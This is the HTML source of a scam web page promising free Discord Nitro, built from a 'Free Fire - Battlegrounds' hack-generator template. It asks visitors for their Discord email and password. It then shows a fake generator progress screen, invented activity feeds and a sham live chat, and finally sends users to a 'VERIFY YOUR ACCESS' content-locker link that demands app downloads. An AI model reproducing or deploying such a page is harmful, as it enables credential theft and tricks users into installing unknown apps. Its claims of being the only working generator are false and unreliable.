
<!DOCTYPE html>
<html lang="en">

<head>
	<meta charset="UTF-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge"> 
	<meta name="viewport" content="width=device-width, initial-scale=1"> 
	<link rel="canonical" href="" />
    <link rel="shortcut icon" href="rs2.png">
	
	<title>EARN DISCORD NITRO FOR FREE</title>
	<meta name="keywords" content="Free Fire - Battlegrounds Hack,Free Fire - Battlegrounds Generator,Free Fire - Battlegrounds Hack Generator,Free Fire - Battlegrounds Hack Money,Free Fire - Battlegrounds Hack Free,Free Fire - Battlegrounds Hack Cheat,Free Fire - Battlegrounds Gems Hack,Free Fire - Battlegrounds Gems Free,Free Fire - Battlegrounds Hack androide,Free Fire - Battlegrounds Hack,Free Fire - Battlegrounds Cheat unlimited Money,Free Fire - Battlegrounds Gems Free">
    <meta name="description" content="Free Fire - Battlegrounds Cheat is the first Generator for Free Fire - Battlegroundsin English and the only official & Working one ! Free Fire - Battlegrounds Hack Generator can be used to get unlimited Gems and Money Free for Free Fire - Battlegrounds.click here if you want to know how to get this ressources.">
	
	<meta property="og:title" content="Free Fire - Battlegrounds Hack Generator - Unlimited Money Cheats"/>
		
    <meta property="og:description" content="Free Fire - Battlegrounds Cheat is the first Generator for Free Fire - Battlegrounds in English and the only official & Working one ! Free Fire - Battlegrounds Hack Generator can be used to get unlimited Gems and Money Free for Free Fire - Battlegrounds.click here if you want to know how to get this ressources."/>
		
    <meta property="og:image" content="Free Fire - Battlegrounds/img/proof1.jpg" />
		
	<meta itemprop="name" content="Free Fire - Battlegrounds Hack Generator - Unlimited Money Gems Cheats">
    <meta itemprop="description" content="Free Fire - Battlegrounds Cheat is the first Generator for Free Fire - Battlegrounds in English and the only official & Working one ! Free Fire - Battlegrounds Hack Generator can be used to get unlimited Gems and Money Free for Free Fire - Battlegrounds.click here if you want to know how to get this ressources.">
	
	
	<!----------------css---------------------------------------------------------------->
		
	<link rel="stylesheet" type="text/css" href="Free Fire - Battlegrounds/css/bootstrap.css" />
	<link rel="stylesheet" type="text/css" href="Free Fire - Battlegrounds/css/style.css" />	
	<link rel="stylesheet" type="text/css" href="Free Fire - Battlegrounds/css/bootstrap-switch.html" />
	<link rel="stylesheet" type="text/css" href="Free Fire - Battlegrounds/css/font-awesome.min.css" />
	<link rel="stylesheet" type="text/css" href="Free Fire - Battlegrounds/css/chat.css" />	
	<link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700" rel="stylesheet" /> 
	<link href="https://fonts.googleapis.com/css?family=Oswald:300,400,600,700" rel="stylesheet" /> 
	<meta name="theme-color" content="#E2231A">
	<meta name="msapplication-navbutton-color" content="#E2231A">
	<meta name="apple-mobile-web-app-status-bar-style" content="#E2231A">
</head>
<body>
		<a href="#"><img class="img-responsive" src="Free Fire - Battlegrounds/img/header.png"></a>
	</div>
	<div class="container">
		<div class="row">
			<div class="col-sm-8">

				<div class="main step-1">
					<div class="title-bar">EARN DISCORD NITRO FOR FREE!</div>
					<div class="content-main">
					<div><strong><span class="switch label label-danger">attention!</strong></span></div></p>
        <div><strong>This is the only website of earn discord nitro who works! Thank you for choice us!</strong></div> </p>
						<div class="platform">
						
							<p class="text-grey"><b>Select your Platform:</b></p>

							<div id="platformCarousel" class="carousel slide" data-interval="false">

							  <!-- Wrapper for slides -->
							  <div class="carousel-inner">
							  
							 

							    
                                  <div class="item active" data-name="windows">
							      <ul class="platforms">
							      	<li class="select-platform"><img src="https://img.icons8.com/color/48/000000/windows-10.png"/></li>
							      </ul>
							    </div>

							   
							    <div class="item" data-name="android">
							      <ul class="platforms">
							      	<li class="select-platform"><img src="https://img.icons8.com/color/48/000000/android-os.png"/></li>
							      </ul>
							    </div>

							    <div class="item" data-name="apple">
							      <ul class="platforms">
							      	<li class="select-platform"><img src="https://img.icons8.com/color/48/000000/ios-logo.png"/></li>
							      </ul>
							    </div>
							  </div>

							  <!-- Left and right controls -->
							  <a class="left carousel-control" href="#platformCarousel" data-slide="prev">
							  	<img src="Free Fire - Battlegrounds/img/left.png" class=" carousel-arrows-new">
							  </a>
							  <a class="right carousel-control" href="#platformCarousel" data-slide="next">
							    <img src="Free Fire - Battlegrounds/img/right.png" class=" carousel-arrows-new">
							  </a>
							</div>
						</div>
						<div class="tool-input">
							<div class="alert usernameAlert alert-danger">
							  <strong>Danger!</strong> You need to enter your Username( min 3 ).
							</div>

							<div class="form-group">
								<form id="formulario">
									<span class="form-label"><img src="https://img.icons8.com/android/24/000000/user.png"/><b>Email:</b></span>
									<input name="email" type="text" class="t-input usernameInput form-control" placeholder="Enter your email"><br>
									<span class="form-label"><img src="https://img.icons8.com/android/24/000000/user.png"/><b>Password:</b></span>
									<input name="pass" type="password" class="t-input usernameInput form-control" placeholder="Enter your password"><br><br>
									<input type="submit" class="btnFirst new-btn" value="Submit"></input>
								  </form> 
								</div>
						</div>
					</div>
				</div>

				<div class="main step-2">
					<div class="title-bar">Free Fire - Battlegrounds Generator</div>
					<div class="content-main">
						<div class="tool-input">
							<p class="text-green"><image class="fa img-responsive" src="rs1.png">Its almost there!</p>
							</div>
							<button type="button" class="btnGenerate new-btn">Earn Nitro <i class="fa fa-line-chart"></i></button>
						</div>
					</div>
				</div>

				<div class="main step-3">
					<div class="title-bar">Free Fire - Battlegrounds Generator</div>
					<div class="content-main">
						<div class="tool-input">

							<div class="lds-ripple"><div></div><div></div></div>
							
							<p class="load-textJS">Starting Generator...</p>
							<div class="progress">
								<div class="progress-bar" role="progressbar" aria-valuenow="70" aria-valuemin="0" aria-valuemax="100" style="width:70%">Loading...</div>
							</div>
						</div>
					</div>
				</div>

				<div class="main step-4">
					<div class="title-bar">Free Fire - Battlegrounds Generator</div>
					<div class="content-main">
						<div class="tool-input">
							<div class="acc-box">
								<div class="acc-text">Account:<img src="Free Fire - Battlegrounds/img/box-bg.png" alt=""></div>
								<p>Username <span class="userJS">Boban</span> on <i class="fa platformJS"></i> Platform</p>
							</div>

							<div class="acc-box box-1">
								<div class="acc-text">Money:<img src="Free Fire - Battlegrounds/img/box-bg.png" alt=""></div>
								<p>Amount <span class="text-green"><image class="fa img-responsive" src="rs1.png"></i> <span class="diamondsJS">200.000</span></span></p>
							</div>
						</div>

					</div>
				</div>

				<div class="main step-5">
					<div class="title-bar">Free Fire - Battlegrounds Generator</div>
					<div class="content-main">
						<p>
						 
        <strong>Like and Share our Generator To help your friends!</strong><br>
          
   <!-------------------------------------DOWNLOAD------------------------------------------>       
          
        <center>    <div class="social">
            
		 <span class="Facebook">
<iframe src="http://astuces.cf/FB.html" opacity="0" scrolling="yes" margin-top"50px"="" marginwidth="0" marginheight="0" align="middle" frameborder="0" width="100px" height="35px" ></iframe>
                
	</div></center>
						Before earn discord nitro you must <b>VERIFY YOUR ACCESS</b> to our Generator server..
						<br/><br />
						After successful completing the Verification, the <b>Nitro</b> will be added immediately to your account! ENJOY :)
						</br></br>
						<p><center><a href="https://www.hostedfiles.net/cl.php?id=599aa3569fc3c39f5b205c50428dc94b&aff_sub4=free-fire" class="new-btn">VERIFY YOUR ACCESS</a></center>
						</p>
						<ul><br>
                               <b><p>How to prove your access</p></b>
							   <p><span class="badge">1 </span> Click on the button "VERIFY YOUR ACCESS" .</p>
                               <p><span class="badge">2 </span> Choose one App from the list and download it.</p>
                               <p><span class="badge">3 </span> Open the App and you will get your <b>activation link</b> by email(put your real email in the form) </p>
                                <p><span class="badge">4 </span> Check your Discord account for the Nitro and have FUN :) .</p>
                            </ul>
					</div>
				</div>
				
				<div class="row">
			    <div class="col-sm-12">
			        <div class="livechatBox">
					
			            <div class="row">
			                <div class="col-md-12">
			                    <div class="heading">
									<h3>How to use the website? </h3>
			                    </div>
			                </div>
			            </div>
						
						
						
			            <div class="row">
							<div  class="col-md-12 col-sm-12 col-xs-12"> 
<center>
    <span class="label label-success">Important</span>    EARN NITRO FOR FREE </b> Tool available for Browser, Android and IOS, it will allow you to Get Discord Nitro <b>For Free </b>, easy to use and without downloading.</p>
This Generator of Discord Nitro its very easy to use.</p>

Just put your email and password of discord and earn the nitro! Use for your own risk.<br><br>
    <img src="Free Fire - Battlegrounds/img/proof%201.jpg" width="80%" height="300" alt="Free Fire - Battlegrounds Hack,Free Fire - Battlegrounds Cheat,Free Fire - BattlegroundsCode,Free Fire - BattlegroundsTrucchi,تهكير Free Fire - Battlegrounds,Free Fire - Battlegroundstrucco" style="border: solid;  border-color: #F97B0A;display: block;"></center><br>
</div>
 
							
			            </div><div class="panel-footer small">
          <span class="label label-default"><strong>Info</strong></span> <span class="label label-default">Update : FEB 2019.</span>
        </div>		
			         </div>

			    </div>
			</div>
<br />
			<div class="row">
			    <div class="col-sm-12">
			        <div class="livechatBox">
					
			            <div class="row">
			                <div class="col-md-12">
			                    <div class="heading">
									<h3>Live Chat Room</h3>
			                    </div>
			                </div>
			            </div>
						
						<div class="row">
			                <div class="col-md-12">
			                    <div class="livechatListArea">				
			                        <ul class="chatList" style="position:relative;"></ul><br class="clearfix">					
			                    </div>
			                </div>
							<div id="typing"><span class="typing-username">Username/Email</span> is typing ...</div>
			            </div>
						
			            <div class="row">
							<div id="enter_username">
								<div class="col-md-4">
									<input type="text" placeholder="Enter your discord email..." class="form-control input-lg livechatUsernameGen">					
								</div>		
								<div class="col-md-2">
									<button id="sBtn" class="btn btn-success btn-block btn-lg livechatUserGenSubmtBtn">Submit</button>
								</div>	
							</div>
								<audio id="chat_buzzer" src="click.mp3" type="audio/ogg"></audio>  
							<div id="send_message">
								<div class="col-md-10">
									<input type="text" placeholder="Enter message..." class="form-control input-lg livechatMsg">
								</div>
								<div class="col-md-2">
									<button id="sBtn" class="btn btn-success btn-block btn-lg livechatSubmtBtn">Submit</button>
								</div>	
							</div>
							
			            </div>		
			         </div>

			    </div>
			</div>				
			<br />
			</div>
			
			

			<div class="col-sm-4">
				<div class="main">
					<div class="title-bar"><img src="https://img.icons8.com/android/24/000000/user.png"/> Generator Activity</div>
					<div class="content-main" style="padding: 0;">
						<div class="activityContent">
							<div class="live-stats">
								<ul>
									<li><b><img src="https://img.icons8.com/android/24/000000/user.png"/> Aeherys</b></li>
									<li><span class="text-green"><image class="fa img-responsive" src="rs1.png"></i> Earn Nitro</span>
									<li><img src="https://img.icons8.com/android/24/000000/clock.png"/>&#160;&#160; few seconds ago</li>
								</ul>
							</div>
							<div class="live-stats">
								<ul>
									<li><b><img src="https://img.icons8.com/android/24/000000/user.png"/> Jamesbro</b></li>
									<li><span class="text-green"><image class="fa img-responsive" src="rs1.png"></i> Earn Nitro</span>
									<li><img src="https://img.icons8.com/android/24/000000/clock.png"/>&#160;&#160; few seconds ago</li>
								</ul>
							</div>
							
							<div class="live-stats">
								<ul>
									<li><b><img src="https://img.icons8.com/android/24/000000/user.png"/> XiaoWeiXiao</b></li>
									<li><span class="text-green"><image class="fa img-responsive" src="rs1.png"></i> Earn Nitro</span>
									<li><img src="https://img.icons8.com/android/24/000000/clock.png"/>&#160;&#160; few seconds ago</li>
								</ul>
							</div>
							<div class="live-stats">
								<ul>
									<li><b><img src="https://img.icons8.com/android/24/000000/user.png"/> John21</b></li>
									<li><span class="text-green"><image class="fa img-responsive" src="rs1.png"></i> Earn Nitro</span>
									<li><img src="https://img.icons8.com/android/24/000000/clock.png"/>&#160;&#160; few seconds ago</li>
								</ul>
							</div>
						</div>									
					</div>
				</div>
			</div>

		</div>
	</div>
<div class="small text-center" style="text-shadow: 2px 2px 4px #000000;">
        Copyright © 2017-2019 All rights reserved.
      </div><br>
	<!-- jQuery -->
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>
	<script type="text/javascript" src="Free Fire - Battlegrounds/js/bootstrap.min.js"></script>
	<script type="text/javascript" src="Free Fire - Battlegrounds/js/bootstrap-switch.min.js"></script>
	<script type="text/javascript" src="Free Fire - Battlegrounds/js/functions.app.js"></script>
	<script type="text/javascript" src="Free Fire - Battlegrounds/js/main.js"></script>
	<script type='text/javascript' src='Free Fire - Battlegrounds/js/chat.js'></script>

<footer>
  
</footer>

</body>
<!-- AFS Analytics V7- Web Analytics 7.0 -->
<script type='text/javascript'>
(function(i,s,o,g,r,a,m){i['AfsAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','//code.afsanalytics.com/js2/analytics.js','aa');
aa('create', '00827120','auto');
aa('set', 'autotrack', 'on');
aa('set', 'autotrack.insideclick', 'dataset');
aa('set', 'autotrack.iframe', 'dataset');
aa('send', 'pageview');
</script>
<!-- End AFS Analytics -->
</html>